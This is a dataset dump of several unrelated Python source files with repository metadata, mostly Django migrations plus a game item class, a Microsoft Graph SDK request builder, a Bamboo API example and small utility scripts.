config = ConfigParser.RawConfigParser()
config.read('server_data/items.ini')
def getid(self):
Item.index += 1
return Item.index
def __init__(self, name, player, container, equipped, world):
#self.name = "%s-%s" % (name, self.getid())
self.name = str(uuid.uuid4())
self.player = player
self.container = container
self.equipped = equipped
self.world = world
self.title = Item.config.get(name, 'title')
self.gear_type = Item.config.get(name, 'gear_type')
self.slot = Item.config.get(name, 'slot')
self.hit = Item.config.getint(name, 'hit')
self.dam = Item.config.getint(name, 'dam')
self.arm = Item.config.getint(name, 'arm')
self.spi = Item.config.getint(name, 'spi')
self.hp = Item.config.getint(name, 'hp')
self.mp = Item.config.getint(name, 'mp')
self.speed = Item.config.getfloat(name, 'speed')
self.icon = Item.config.get(name,'icon')
self.value = Item.config.getint(name, 'value')
self.consumeable = Item.config.getboolean(name, 'consumeable')
self.world.items[self.name] = self
def state(self):
return { 'title': self.title, 'name': self.name, 'slot': self.slot, 'equipped': self.equipped, 'gear_type': self.gear_type, 'icon': self.icon, 'hit': self.hit, 'dam': self.dam, 'arm': self.arm, 'spi': self.spi, 'speed': self.speed, 'value': self.value, 'hp': self.hp, 'mp': self.mp, 'consumeable': self.consumeable }
|
[
"dablum@mit.edu"
] |
dablum@mit.edu
|
b393a423256aa0f889b3a2d9a5f23682e1c3053d
|
31136f3b2aa9ff7166f771a7f4e1da8dd1764b2e
|
/website/events/migrations/0005_auto_20190715_1440.py
|
ec4ca8cd745c5758545e2f31f6086ffdfe7a64c0
|
[
"MIT"
] |
permissive
|
PyAr/asoc_members
|
202bb05f6c58644f5edb19c80a7276b493d3c76b
|
ed3944acadd7d08e53acd6edb5961a4248ea4782
|
refs/heads/master
| 2023-04-15T07:41:45.725797
| 2023-04-11T15:13:24
| 2023-04-11T15:13:24
| 131,543,379
| 10
| 26
|
MIT
| 2023-08-22T22:41:12
| 2018-04-30T01:10:30
|
Python
|
UTF-8
|
Python
| false
| false
| 7,405
|
py
|
# Generated by Django 2.0.4 on 2019-07-15 14:40
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
import django_extensions.db.fields
import events.helpers.models
import events.models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('events', '0004_auto_20190618_1853'),
]
operations = [
migrations.CreateModel(
name='Expense',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
('description', models.CharField(blank=True, default='', help_text='Descripción del gasto', max_length=317, verbose_name='descripción')),
('amount', models.DecimalField(decimal_places=2, max_digits=18, verbose_name='monto')),
('invoice_type', models.CharField(choices=[('A', 'Factura A'), ('B', 'Factura B'), ('C', 'Factura C'), ('Tic', 'Ticket'), ('Otr', 'Otro')], max_length=5, verbose_name='tipo factura')),
('invoice_date', models.DateField(verbose_name='fecha factura')),
('invoice', models.FileField(upload_to=events.models.expense_upload_path, verbose_name='factura')),
('category', models.CharField(choices=[('Prv', 'Gasto proveedor'), ('Ref', 'Reintegro organizador')], max_length=5, verbose_name='tipo gasto')),
],
options={
'permissions': (('view_expenses', 'puede ver gastos'),),
},
bases=(events.helpers.models.SaveReversionMixin, models.Model),
),
migrations.CreateModel(
name='Payment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
('document', models.FileField(upload_to='media/events/payments/', verbose_name='comprobante')),
('changed_by', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='events_payment_changed_by', to=settings.AUTH_USER_MODEL)),
('created_by', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='events_payment_created_by', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
bases=(events.helpers.models.SaveReversionMixin, models.Model),
),
migrations.CreateModel(
name='Provider',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
('document_number', models.CharField(help_text='CUIT del propietario de la cuenta, formato ##-########-#', max_length=13, unique=True, validators=[django.core.validators.RegexValidator('^(20|23|24|27|30|33|34)-[0-9]{8}-[0-9]$', 'El CUIT ingresado no es correcto.')], verbose_name='CUIT')),
('bank_entity', models.CharField(help_text='Nombre de la entiedad bancaria.', max_length=317, verbose_name='entidad bancaria')),
('account_number', models.CharField(help_text='Número de cuenta.', max_length=13, verbose_name='número de cuenta')),
('account_type', models.CharField(choices=[('CC', 'Cuenta corriente'), ('CA', 'Caja de ahorros')], max_length=3, verbose_name='Tipo cuenta')),
('organization_name', models.CharField(help_text='Razón social o nombre del propietario de la cuenta.', max_length=317, verbose_name='razón social')),
('cbu', models.CharField(help_text='CBU de la cuenta', max_length=317, verbose_name='CBU')),
('changed_by', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='events_provider_changed_by', to=settings.AUTH_USER_MODEL)),
('created_by', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='events_provider_created_by', to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ['-created'],
'permissions': (('view_providers', 'puede ver proveedores'),),
},
bases=(events.helpers.models.SaveReversionMixin, models.Model),
),
migrations.CreateModel(
name='OrganizerRefund',
fields=[
('expense_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='events.Expense')),
('organizer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='refunds', to='events.Organizer', verbose_name='Organizador')),
('payment', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='events.Payment', verbose_name='pago')),
],
options={
'abstract': False,
},
bases=('events.expense',),
),
migrations.CreateModel(
name='ProviderExpense',
fields=[
('expense_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='events.Expense')),
('payment', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='events.Payment', verbose_name='pago')),
('provider', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='expenses', to='events.Provider', verbose_name='Proveedor')),
],
options={
'abstract': False,
},
bases=('events.expense',),
),
migrations.AddField(
model_name='expense',
name='changed_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='events_expense_changed_by', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='expense',
name='created_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='events_expense_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='expense',
name='event',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='expenses', to='events.Event', verbose_name='Evento'),
),
]
|
[
"andres.ramirez.miori@gmail.com"
] |
andres.ramirez.miori@gmail.com
|
2f9db9f890c9233e5af1669088468a7683d1af35
|
0fb3b73f8e6bb9e931afe4dcfd5cdf4ba888d664
|
/awssam/fullfeblog/blog/migrations/0002_auto_20201208_1414.py
|
b61387acb7dcbe792fb0d7d8887e97d528f46789
|
[] |
no_license
|
mrpal39/ev_code
|
6c56b1a4412503604260b3346a04ef53a2ba8bf2
|
ffa0cf482fa8604b2121957b7b1d68ba63b89522
|
refs/heads/master
| 2023-03-24T03:43:56.778039
| 2021-03-08T17:48:39
| 2021-03-08T17:48:39
| 345,743,264
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,023
|
py
|
# Generated by Django 3.1.4 on 2020-12-08 14:14
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('blog', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='post',
options={'ordering': ('-publish',)},
),
migrations.RenameField(
model_name='post',
old_name='content',
new_name='body',
),
migrations.RenameField(
model_name='post',
old_name='date_posted',
new_name='publish',
),
migrations.AddField(
model_name='post',
name='created',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AddField(
model_name='post',
name='slug',
field=models.SlugField(default=django.utils.timezone.now, max_length=250, unique_for_date='publish'),
preserve_default=False,
),
migrations.AddField(
model_name='post',
name='status',
field=models.CharField(choices=[('draft', 'Draft'), ('published', 'Published')], default='draft', max_length=10),
),
migrations.AddField(
model_name='post',
name='updated',
field=models.DateTimeField(auto_now=True),
),
migrations.AlterField(
model_name='post',
name='author',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='blog_posts', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='post',
name='title',
field=models.CharField(max_length=250),
),
]
|
[
"rp9545416@gmail.com"
] |
rp9545416@gmail.com
|
af9bf83cfaf55cd781211bfc9927638d904f30f8
|
975b2d421d3661e6770b601929d5f11d981d8985
|
/msgraph/generated/sites/item/term_stores/item/groups/item/sets/item/children/item/children/item/relations/item/set/set_request_builder.py
|
8ad5043efe01acfd37aa331d26266f34c018c4b3
|
[
"MIT"
] |
permissive
|
microsoftgraph/msgraph-sdk-python
|
a7c551b85daadeebf76ec4ae12668664ea639b42
|
27de7ccbe688d7614b2f6bde0fdbcda4bc5cc949
|
refs/heads/main
| 2023-09-03T21:45:27.989672
| 2023-08-31T06:22:18
| 2023-08-31T06:22:18
| 534,665,999
| 135
| 18
|
MIT
| 2023-09-14T11:04:11
| 2022-09-09T14:00:17
|
Python
|
UTF-8
|
Python
| false
| false
| 4,960
|
py
|
from __future__ import annotations
from dataclasses import dataclass, field
from kiota_abstractions.base_request_builder import BaseRequestBuilder
from kiota_abstractions.get_path_parameters import get_path_parameters
from kiota_abstractions.method import Method
from kiota_abstractions.request_adapter import RequestAdapter
from kiota_abstractions.request_information import RequestInformation
from kiota_abstractions.request_option import RequestOption
from kiota_abstractions.serialization import Parsable, ParsableFactory
from typing import Any, Callable, Dict, List, Optional, TYPE_CHECKING, Union
if TYPE_CHECKING:
from ................models.o_data_errors.o_data_error import ODataError
from ................models.term_store.set import Set
class SetRequestBuilder(BaseRequestBuilder):
"""
Provides operations to manage the set property of the microsoft.graph.termStore.relation entity.
"""
def __init__(self,request_adapter: RequestAdapter, path_parameters: Optional[Union[Dict[str, Any], str]] = None) -> None:
"""
Instantiates a new SetRequestBuilder and sets the default values.
Args:
path_parameters: The raw url or the Url template parameters for the request.
request_adapter: The request adapter to use to execute the requests.
"""
super().__init__(request_adapter, "{+baseurl}/sites/{site%2Did}/termStores/{store%2Did}/groups/{group%2Did}/sets/{set%2Did}/children/{term%2Did}/children/{term%2Did1}/relations/{relation%2Did}/set{?%24select,%24expand}", path_parameters)
async def get(self,request_configuration: Optional[SetRequestBuilderGetRequestConfiguration] = None) -> Optional[Set]:
"""
The [set] in which the relation is relevant.
Args:
request_configuration: Configuration for the request such as headers, query parameters, and middleware options.
Returns: Optional[Set]
"""
request_info = self.to_get_request_information(
request_configuration
)
from ................models.o_data_errors.o_data_error import ODataError
error_mapping: Dict[str, ParsableFactory] = {
"4XX": ODataError,
"5XX": ODataError,
}
if not self.request_adapter:
raise Exception("Http core is null")
from ................models.term_store.set import Set
return await self.request_adapter.send_async(request_info, Set, error_mapping)
def to_get_request_information(self,request_configuration: Optional[SetRequestBuilderGetRequestConfiguration] = None) -> RequestInformation:
"""
The [set] in which the relation is relevant.
Args:
request_configuration: Configuration for the request such as headers, query parameters, and middleware options.
Returns: RequestInformation
"""
request_info = RequestInformation()
request_info.url_template = self.url_template
request_info.path_parameters = self.path_parameters
request_info.http_method = Method.GET
request_info.headers["Accept"] = ["application/json"]
if request_configuration:
request_info.add_request_headers(request_configuration.headers)
request_info.set_query_string_parameters_from_raw_object(request_configuration.query_parameters)
request_info.add_request_options(request_configuration.options)
return request_info
@dataclass
class SetRequestBuilderGetQueryParameters():
"""
The [set] in which the relation is relevant.
"""
def get_query_parameter(self,original_name: Optional[str] = None) -> str:
"""
Maps the query parameters names to their encoded names for the URI template parsing.
Args:
original_name: The original query parameter name in the class.
Returns: str
"""
if not original_name:
raise TypeError("original_name cannot be null.")
if original_name == "expand":
return "%24expand"
if original_name == "select":
return "%24select"
return original_name
# Expand related entities
expand: Optional[List[str]] = None
# Select properties to be returned
select: Optional[List[str]] = None
from kiota_abstractions.base_request_configuration import BaseRequestConfiguration
@dataclass
class SetRequestBuilderGetRequestConfiguration(BaseRequestConfiguration):
from kiota_abstractions.base_request_configuration import BaseRequestConfiguration
"""
Configuration for the request such as headers, query parameters, and middleware options.
"""
# Request query parameters
query_parameters: Optional[SetRequestBuilder.SetRequestBuilderGetQueryParameters] = None
|
[
"GraphTooling@service.microsoft.com"
] |
GraphTooling@service.microsoft.com
|
9138de1148cd345ac2d731ad25502eed850fa264
|
2d83d627c446fa84e301f27196f893902066a8a3
|
/smartcity/dbview/migrations/0008_auto_20171030_1950.py
|
8a2f889d476a5e7077de8a008cc9e650156ad104
|
[] |
no_license
|
PoeticIron/ifb299-57lines
|
1e71a79c97a05c0ff7e6c1651469dbd0904385a7
|
837d49437c674daafec805c8f4b1a6c7f595eedf
|
refs/heads/master
| 2021-01-01T18:36:47.580779
| 2017-11-03T05:42:05
| 2017-11-03T05:42:05
| 98,384,561
| 0
| 2
| null | 2017-09-19T07:34:37
| 2017-07-26T05:51:16
|
Python
|
UTF-8
|
Python
| false
| false
| 639
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-10-30 09:50
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('dbview', '0007_auto_20171030_1947'),
]
operations = [
migrations.AlterField(
model_name='museums',
name='Lat',
field=models.CharField(default='-27.4772', max_length=30),
),
migrations.AlterField(
model_name='museums',
name='Lon',
field=models.CharField(default='153.0278', max_length=30),
),
]
|
[
"nmestone@gmail.com"
] |
nmestone@gmail.com
|
58cbe82bcc8bd6afeed52101fca9d77621105eef
|
4be56098894a95da5964622fc4102b69e4530ab6
|
/题库/1399.页面推荐.py
|
5a140da6d4ab9fa5c70e7d7e978fdf740737d005
|
[] |
no_license
|
ACENDER/LeetCode
|
7c7c7ecc8d0cc52215272f47ec34638637fae7ac
|
3383b09ab1246651b1d7b56ab426a456f56a4ece
|
refs/heads/master
| 2023-03-13T19:19:07.084141
| 2021-03-15T09:29:21
| 2021-03-15T09:29:21
| 299,332,864
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 80
|
py
|
# !/usr/bin/env python3
# -*- coding: utf-8 -*-
# @File : 1399.页面推荐.py
|
[
"1641429327@qq.com"
] |
1641429327@qq.com
|
11e7feb68dc8e7c7d92ddb397418250a2ca1228e
|
eb3cd8723752e34e46728d02d5f95f3e8e7a864d
|
/Django/myvenv/bin/chardetect-3.8
|
d426c822917bb3d16d6de63f05b1eeafdc98791e
|
[] |
no_license
|
AbhisarSaraswat/Projects
|
bdf5b455e6f2480401d646c1115be1a79de6b83d
|
59fe23b803a3d7617b26ecec4259c418704d4cc7
|
refs/heads/master
| 2021-11-17T09:51:32.410418
| 2021-05-21T10:42:31
| 2021-05-21T10:42:31
| 168,728,445
| 0
| 0
| null | 2021-09-22T19:50:09
| 2019-02-01T16:40:42
|
Python
|
UTF-8
|
Python
| false
| false
| 245
|
8
|
#!/home/lucifer/Projects/myvenv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from chardet.cli.chardetect import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"abhisarsaraswat@gmail.com"
] |
abhisarsaraswat@gmail.com
|
f50f22f4257ef2bd4b135c4c4b543869c019f8b8
|
4eeb40dcc265caf4a2b84bc90a28d481930d6a8a
|
/cssproject/cssproject/wsgi.py
|
e87cec6d202682e65310c1cd76e7ac0245d43209
|
[] |
no_license
|
mprasu/Sample-Projects
|
eb7fc46e81b09d7c97c238047e3c93b6fff3fb8d
|
7363baf630900ab2babb4af2afe77911d8a548b2
|
refs/heads/master
| 2020-04-16T06:43:16.345750
| 2019-01-12T07:07:34
| 2019-01-12T07:07:34
| 165,358,055
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 397
|
py
|
"""
WSGI config for cssproject project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "cssproject.settings")
application = get_wsgi_application()
|
[
"muppuriprasanna5@gmail.com"
] |
muppuriprasanna5@gmail.com
|
9ba996ef80069b6979c8495ddbf3ffbab87f533c
|
d0af71157005190c6421b640b0e6cee2f237aace
|
/examples/bamboo/bamboo_plan_directory_info.py
|
9706338f0eb798ba9532324312cadf808092d542
|
[
"Apache-2.0"
] |
permissive
|
atlassian-api/atlassian-python-api
|
d8adeb43ea4c92c10a03f1b53b53b87820f1841d
|
bb1c0f2d4187ba8efa1a838cd0041b54c944fee8
|
refs/heads/master
| 2023-08-29T06:57:22.136461
| 2023-08-27T18:53:00
| 2023-08-27T18:53:00
| 19,530,263
| 1,130
| 679
|
Apache-2.0
| 2023-09-13T19:27:44
| 2014-05-07T10:26:26
|
Python
|
UTF-8
|
Python
| false
| false
| 433
|
py
|
# coding=utf-8
import os
from atlassian import Bamboo
BAMBOO_URL = os.environ.get("BAMBOO_URL", "http://localhost:8085")
ATLASSIAN_USER = os.environ.get("ATLASSIAN_USER", "admin")
ATLASSIAN_PASSWORD = os.environ.get("ATLASSIAN_PASSWORD", "admin")
bamboo = Bamboo(url=BAMBOO_URL, username=ATLASSIAN_USER, password=ATLASSIAN_PASSWORD)
plan_directories_roots = bamboo.plan_directory_info("PROJ-PLAN")
print(plan_directories_roots)
|
[
"noreply@github.com"
] |
noreply@github.com
|
ddbeff68f2104fbd657620867d9acc172c5adecb
|
3af6960c805e9903eb27c09d8bc7ebc77f5928fe
|
/problems/0190_Reverse_Bits/__init__.py
|
13d13496fce71652ff8239e68ab130a72e9cc66e
|
[] |
no_license
|
romain-li/leetcode
|
b3c8d9d4473eebd039af16ad2d4d99abc2768bdd
|
5e82b69bd041c2c168d75cb9179a8cbd7bf0173e
|
refs/heads/master
| 2020-06-04T20:05:03.592558
| 2015-06-08T18:05:03
| 2015-06-08T18:05:03
| 27,431,664
| 2
| 1
| null | 2015-06-08T18:05:04
| 2014-12-02T12:31:58
|
Python
|
UTF-8
|
Python
| false
| false
| 656
|
py
|
ID = '190'
TITLE = 'Reverse Bits'
DIFFICULTY = 'Easy'
URL = 'https://oj.leetcode.com/problems/reverse-bits/'
BOOK = False
PROBLEM = r"""Reverse bits of a given 32 bits unsigned integer.
For example, given input 43261596 (represented in binary as
**00000010100101000001111010011100**), return 964176192 (represented in binary
as **00111001011110000010100101000000**).
**Follow up**:
If this function is called many times, how would you optimize it?
Related problem: [Reverse Integer](/problems/reverse-integer/)
**Credits:**
Special thanks to [@ts](https://oj.leetcode.com/discuss/user/ts) for adding
this problem and creating all test cases.
"""
|
[
"romain_li@163.com"
] |
romain_li@163.com
|
f28ba09e107306b65b13e2ac8683488c3fbf89a0
|
13152e95d8f0fa7c9b9bcb0be368b869b8c34b0f
|
/apps/diary/migrations/0003_auto_20180929_1857.py
|
869839b1cbe31778bbda7881611ab44efa2b9530
|
[] |
no_license
|
Emiyaaaaa/personalweb
|
75872239a963ce59665735a2c9bfff46dc2a671a
|
a4d47dc9a3a5fdf1c3d24d587a177e19b878b661
|
refs/heads/master
| 2021-06-03T09:22:31.201318
| 2020-09-02T07:16:49
| 2020-09-02T07:16:49
| 148,086,883
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 386
|
py
|
# Generated by Django 2.1.1 on 2018-09-29 18:57
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('diary', '0002_diary_diarycomment'),
]
operations = [
migrations.AlterModelOptions(
name='diarycomment',
options={'verbose_name': '评论', 'verbose_name_plural': '评论'},
),
]
|
[
"2914034404@qq.com"
] |
2914034404@qq.com
|
d8ded25ef10e93c72605b89d85452c69e80636d6
|
9fdc3443090052d31089f8181cfce4d62ca97616
|
/exception_handling_advanced_example61.py
|
aaca7a2d555cedf68e1fb60cee48b451d3e7b846
|
[] |
no_license
|
ahmedyoko/python-course-Elzero
|
9d82b08e81d597292ee85c0d517d8116d0be0905
|
bc11dca9b7ccbccb7c66d6a5b34ded0e6dedc9f8
|
refs/heads/master
| 2023-07-25T19:44:22.073679
| 2021-09-07T19:35:30
| 2021-09-07T19:35:30
| 399,866,512
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,097
|
py
|
#...........................................
# exception_handling_advanced_examples
# try | except | else | finally
#....................................................
the_file = None
the_tries = 5
while the_tries > 0 :
print(f'{the_tries} tries left')
the_tries -= 1
else :
print('All tries are done')
print('*'*50)
the_file = None
the_tries = 5
while the_tries > 0 :
try : # try to open the file
print('enter the file name with the absolute path to open')
print(f'you have {the_tries} tries left')
print('Example => D:\python\file\yourfile.extension')
file_name_and_path = input('file name => : ').strip().lower()
the_file = open(file_name_and_path,'r')
print(the_file.read())
break
except FileNotFoundError:
print('the file not found please be sure the name is valid')
the_tries -= 1
except :
print('error happens')
finally :
if the_file is not None :
the_file.close()
print('the file is closed')
else :
print('All tries are done')
|
[
"aos438479@gmail.com"
] |
aos438479@gmail.com
|
45278734804df48db80172a886fbefcd6bf1b64f
|
dd1462c6dd2aacf13113834854be92b119315722
|
/commands.py
|
ff1f0b7e79f927c5cdb5fd2a885a25572c1fbd0c
|
[] |
no_license
|
voiceassistant-SEDA/Voice-Asistant
|
8d9298f2b5e41c0f14c9d8f31de58df1deca0a93
|
7995875fccde96f4745f4c87fc370d81ac7f61ef
|
refs/heads/main
| 2023-05-05T11:45:07.850369
| 2021-05-21T15:45:33
| 2021-05-21T15:45:33
| 369,581,536
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,342
|
py
|
import os
import json
import function
import backend
import random
from fuzzywuzzy import process
import Levenshtein as lev
class Commands :
def __init__ (self,function,module,neuralNetwork) :
self.function = function
self.module = module
self.neuralNetwork = neuralNetwork
with open ("./Data/commands.json","r",encoding='utf8' ) as file:
self.commands=json.load (file)
def Run (self,data) :
data=data.lower()
for key in self.commands.keys():
for command in self.commands[key]:
if data in self.commands[key][command]:
return self.Execute( command,key )
#search komutları
words=data.split(" ")
for command in self.commands["search"].keys():
for word in words:
if word in self.commands["search"][command]:
words.remove(word)
search=""
for i in words:
search+=i+" "
return self.Execute(command,"search",search)
"""
#Yapay sinir ağı analizi
i = neuralNetwork.Analyse(data)
if i == 1:
data=data.lower()
ratio = 0
command = ""
key=""
for k in self.commands.keys():
for com in self.commands[k]:
highest = process.extractOne(data,com)
if ratio<highest[1]:
ratio=highest[1]
command=highest[0]
key=k
return self.Execute(command,key)
elif i == 2:
self.Execute2()
else:
data=data.lower()
ratio = 0
command = ""
key=""
for k in self.commands.keys():
for com in self.commands[k]:
highest = process.extractOne(data,com)
if ratio<highest[1]:
ratio=highest[1]
command=highest[0]
key=k
return self.Execute(command,key)
"""
self.module.speak ("Ne dediğini anlayamadım.")
return 1
def Execute (self,command,commandType,search="") :
#conversation
if commandType=="sohbetCumleleri":
if command=="nasilsin":
self.module.speak(random.choice(self.commands["nasilsindonusCumleleri"]["donus"]))
elif command=="tesekkur":
self.module.speak("Rica ederim {}".format(self.function.GetInfo("name")))
elif command=="iyiyim":
self.module.speak("Hep iyi ol :)")
#user update
elif commandType=="update" :
if command=="isimguncelle" :
if self.function.UpdateInfo ("name"):
self.module.speak ("İsmini {} olarak güncelledim".format( self.function.GetInfo ("name")))
elif command=="yasguncelle" :
if self.function.UpdateInfo( "age"):
self.module.speak("Yaşını {} olarak güncelledim.".format(self.function.GetInfo("age")))
elif command=="sehirguncelle":
if self.function.UpdateInfo("hometown","city"):
self.module.speak("Yaşadığın şehri {} olarak güncelledim.".format(self.function.GetInfo("hometown","city")))
elif command=="dogumtarihiguncelle":
if self.function.UpdateInfo("birthdate"):
self.module.speak("Doğum tarihini {} olarak güncelledim.".format(self.function.GetInfo("birthdate")))
elif command=="okulguncelle":
if self.function.UpdateInfo("university","faculty","department"):
self.module.speak("Okul bilgilerini {} olarak güncelledim.".format(self.function.GetInfo("university","faculty","department")))
elif command=="meslekguncelle":
if self.function.UpdateInfo("job"):
self.module.speak( "Meslek bilgilerini {} olarak güncelledim.".format(self.function.GetInfo("job")))
#user info
elif commandType=="getInfo" :
if command=="meslekgetir" :
self.module.speak(self.function.GetInfo ("job"))
if command=="yasgetir":
self.module.speak(self.function.GetInfo("age"))
if command=="sehirgetir":
self.module.speak(self.function.GetInfo("hometown","city"))
if command=="dogumtarihigetir":
self.module.speak(self.function.GetInfo("birthdate"))
if command=="okulbilgisigetir":
self.module.speak(self.function.GetInfo("school","university"))
self.module.speak(self.function.GetInfo("school","faculty"))
self.module.speak(self.function.GetInfo("school","department"))
#asistan info
elif commandType=="asistanInfo" :
if command=="kendinitanit" :
self.module.speak ("Merhabalar benim adım Seda. Ben bir sesli asistanım" )
elif command=="isimsoru" :
self.module.speak ("Benim adım Seda" )
#time functions
elif commandType=="timeFunctions" :
if command=="saatSoru" :
self.module.speak ("Şu an saat "+self.function.Clock() )
elif command=="tarihSoru" :
self.module.speak ("Bugün: "+self.function.Date())
#quick search
elif commandType=="quickSearch":
if command=="havaDurumuSoru":
self.module.speak("İşte bugünkü hava durumu:")
self.function.Search("Hava durumu")
#search
elif commandType=="search":
if command=="webAra":
self.module.speak("İşte senin için bulduklarım: ")
self.function.Search(search)
if command=="musicAra":
self.function.YoutubePlay(search)
#close
elif commandType=="close" :
if command=="kapat" :
self.module.speak ("Görüşmek üzere {}".format (self.function.GetInfo ("name")))
return 0
else:
self.module.speak ("Bir şeyler ters gitti" )
return 0
return 1
|
[
"73945726+sirmakalender@users.noreply.github.com"
] |
73945726+sirmakalender@users.noreply.github.com
|
fd5b3d07a2a0a980e3a2da89214375a9c7a9d6ec
|
1cfb61bb6cee6c8978ad50956d5af36edeb7ee6f
|
/menu/migrations/0007_auto_20161007_1750.py
|
21534b135687d6b66964406bad09b712e06dffb0
|
[] |
no_license
|
greenmails2001/analytics
|
221a2264e8a9db63df9ab57fa6393b1e0df62052
|
cfde53d5402f302e904b96991d67a0c9a210a6c9
|
refs/heads/master
| 2021-01-11T05:43:43.666368
| 2016-10-31T14:45:11
| 2016-10-31T14:45:11
| 71,340,991
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,978
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('menu', '0006_auto_20161005_1327'),
]
operations = [
migrations.RenameField(
model_name='file',
old_name='created',
new_name='createddate',
),
migrations.RenameField(
model_name='file',
old_name='updated',
new_name='updateddate',
),
migrations.RenameField(
model_name='image',
old_name='created',
new_name='createddate',
),
migrations.RenameField(
model_name='image',
old_name='updated',
new_name='updateddate',
),
migrations.RenameField(
model_name='menudetail',
old_name='created',
new_name='createddate',
),
migrations.RenameField(
model_name='menudetail',
old_name='updated',
new_name='updateddate',
),
migrations.RenameField(
model_name='menuheader',
old_name='created',
new_name='createddate',
),
migrations.RenameField(
model_name='menuheader',
old_name='updated',
new_name='updateddate',
),
migrations.RenameField(
model_name='text',
old_name='created',
new_name='createddate',
),
migrations.RenameField(
model_name='text',
old_name='updated',
new_name='updateddate',
),
migrations.RenameField(
model_name='video',
old_name='created',
new_name='createddate',
),
migrations.RenameField(
model_name='video',
old_name='updated',
new_name='updateddate',
),
]
|
[
"greenmails2001@gmail.com"
] |
greenmails2001@gmail.com
|
de075cc155d45012e62fee4fd10dbfd477ea0b69
|
5e0ef0a177306aa205493259cc274be7bb72b9eb
|
/login_and_registration/apps/log_regs_app/urls.py
|
0167a0fd2c5be22b28dbfc5dee64462961a66956
|
[] |
no_license
|
reinib/PythonDjangoCD
|
07654f45e6e339cb3091d66d7bfccb04a46111d1
|
5fef1906a90c997c13a17ef9aec0df30733d5ea8
|
refs/heads/master
| 2020-04-11T10:31:42.034181
| 2018-12-14T01:55:06
| 2018-12-14T01:55:06
| 161,717,686
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 259
|
py
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.index),
url(r'^validate_register$', views.validate_register),
url(r'^users/(?P<id>\d+)$', views.success),
url(r'^validate_login$', views.validate_login),
]
|
[
"brent.reininger89@gmail.com"
] |
brent.reininger89@gmail.com
|
840f45903a811282a9e7105496d723fef512547a
|
743778017a0e775832e45fc05d9a056604f608ad
|
/km71/Guro_Dmytro/4/Task7.py
|
e6d342044e39db64385b0d1b3e66988e2430196c
|
[] |
no_license
|
Kalinia/amis_python71
|
fed5ff37a5909c090a53962daa689141498755b1
|
0123af48b1eaa6d752409b1b643f548c6b0e4ab8
|
refs/heads/master
| 2021-05-07T17:24:21.974699
| 2017-12-21T22:13:00
| 2017-12-21T22:13:00
| 108,726,150
| 0
| 0
| null | 2017-10-29T10:54:14
| 2017-10-29T10:54:14
| null |
UTF-8
|
Python
| false
| false
| 590
|
py
|
while True:
try:
